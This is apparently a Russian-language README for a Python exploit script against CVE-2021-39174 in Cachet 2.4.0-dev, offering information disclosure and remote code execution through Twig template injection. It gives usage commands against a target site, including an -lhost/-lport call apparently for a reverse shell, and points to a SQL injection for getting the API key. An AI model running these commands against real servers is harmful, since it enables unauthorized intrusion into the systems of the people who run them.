
CVE-2021-39174 Cachet 2.4.0-dev
Python3-скрипт для CVE-2021-39174 Cachet 2.4.0-dev — раскрытие информации и RCE через Twig Server Side Template Injection. Для RCE требуется API-ключ пользователя. Ознакомьтесь со ссылкой Leave Songs ниже, где описано, как получить API-ключ через SQL-инъекцию CVE-2021-39165.
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
Для вызова справки:
python3 cachet_2.4.0-dev.py -h
Весь код, представленный в этом репозитории, предназначен исключительно для образовательных/исследовательских целей. Любые действия и/или деятельность, связанные с материалами, содержащимися в этом репозитории, являются исключительно вашей ответственностью. Неправильное использование кода из этого репозитория может повлечь за собой уголовное преследование соответствующих лиц. Автор не несёт ответственности в случае возбуждения уголовных дел против лиц, неправомерно использующих код из этого репозитория для нарушения закона.